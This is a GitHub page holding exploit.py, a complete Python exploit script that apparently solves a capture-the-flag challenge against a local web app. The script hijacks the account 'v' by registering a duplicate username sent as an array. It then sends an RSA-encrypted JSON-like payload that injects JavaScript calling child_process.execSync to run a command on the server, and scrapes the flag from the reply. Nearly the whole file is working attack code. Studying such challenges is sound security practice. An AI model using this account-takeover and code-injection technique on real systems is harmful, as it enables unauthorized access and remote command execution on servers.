-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathexploit.py
79 lines (67 loc) · 2.69 KB
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
import sys
import requests
import string
import random
import base64
from Crypto.Cipher import PKCS1_v1_5
from Crypto.PublicKey import RSA
# This function generates a random string of a given length.
def randomString(length = 16):
return "".join(random.choice(string.digits + string.ascii_letters) for i in range(length))
# This function encrypts a text with a given public RSA key.
def encryptWithRsa(keyString, text):
key = RSA.importKey(keyString)
cipher = PKCS1_v1_5.new(key)
# Make sure the encryption works in Python v2 and Python v3.
if sys.version[:1] == "2":
return base64.b64encode(cipher.encrypt(text))
else:
return base64.b64encode(cipher.encrypt(bytes(text, "utf8"))).decode("ascii")
def main(argv):
# Set the base URL and the public key.
baseUrl = "http://localhost:8080"
key = """-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA7Aw1Zin9eJUsrSyV0jSn
XwmevusOEPyW9C4BN1FtQ2VKfb98e+2lcrXP7W0+Mk7Ck93PAc0tPinsj79YBgLK
W/J31zDsPcpAEXbrH8R6rfHRGZWH/12aMPGl9/329GEpWzl/RLe2REqnNNn6PYxK
1Zms3If3meQ60g9JcOmGb9+lUOqa4bFtX8AUvU4oLp/sqRIp7ABAw/pqAbWV6TON
j1rFZlic1lh8ClUG1cbsP9ysx2TIjZo6DQ6BIzPUbPlwLVxG+wQJmhWzGHcEEteV
r8PIxBUw5QsySN5FbyTaiTlp0Usi+3wJOpgb+xrw9EQWcOXZiaZshxKaMT33ssys
qQIDAQAB
-----END PUBLIC KEY-----"""
headers = {"Content-Type": "application/x-www-form-urlencoded"}
# Create a new session.
s = requests.Session()
# Register a new user where the username is an array of strings.
s.post(
baseUrl + "/users/register",
data = "username=v&username=" + randomString(32) + "&password=a&passwordConfirm=a",
headers = headers
)
# Login with the hijacked account of the hacker "v".
s.post(
baseUrl + "/users/login",
data = "username=v&password=a",
headers = headers
)
# Create a new request for the hacker "v".
plaintext = '"message": (() => require("child_process").execSync("/usr/bin/get_flag").toString())(), "tags": ["you", "got", "hacked"]'
encrypted = encryptWithRsa(key, plaintext)
res = s.post(
baseUrl + "/dashboard/request/v",
data = "data=" + encrypted.replace("+", "%2B"),
headers = headers
)
# View all request for the hacker "v".
res = s.get(baseUrl + "/dashboard")
# Get the id from the request that we just created.
id = res.text.split("/dashboard/view/")[1].split("\"")[0]
# Visit the page for the request.
res = s.get(baseUrl + "/dashboard/view/" + id)
# Search for the flag.
if not "flag_" in res.text:
print("No flag found...")
return
print("flag_" + res.text.replace("\n", "").split("flag_")[1].split("<")[0])
if __name__ == "__main__":
main(sys.argv)